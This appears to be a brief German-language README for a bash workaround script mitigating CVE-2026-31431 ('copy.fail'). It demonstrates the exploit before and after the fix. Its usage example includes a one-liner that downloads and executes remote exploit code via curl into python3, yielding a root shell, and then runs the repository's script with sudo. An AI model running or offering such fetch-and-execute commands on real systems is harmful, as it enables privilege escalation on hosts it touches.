
Stellt ein Bash-Workaround-Skript zur Verfügung, um CVE-2026-31431 zu entschärfen und Remote-Code-Ausführung über den copy.fail-Exploit zu verhindern. Enthält Nutzungsanweisungen zur Anwendung des Fixes.
copyFail-CVE-2026-31431-workaround-bash
einige Verwendung:
user@host:~$ python3 -c "$(curl -s https://copy.fail/exp -o-)"
# id
uid=0(root) gid=1000(user)
# ctrl+d
user@host:~$ git clone https://github.com/someCorp/copyFail-CVE-2026-31431-workaround-bash
user@host:~$ sudo bash copyFail-CVE-2026-31431-workaround-bash/qdf.sh
user@host:~$ python3 -c "$(curl -s https://copy.fail/exp -o-)"
Traceback (most recent call last):
File "<string>", line 9, in <module>
File "<string>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory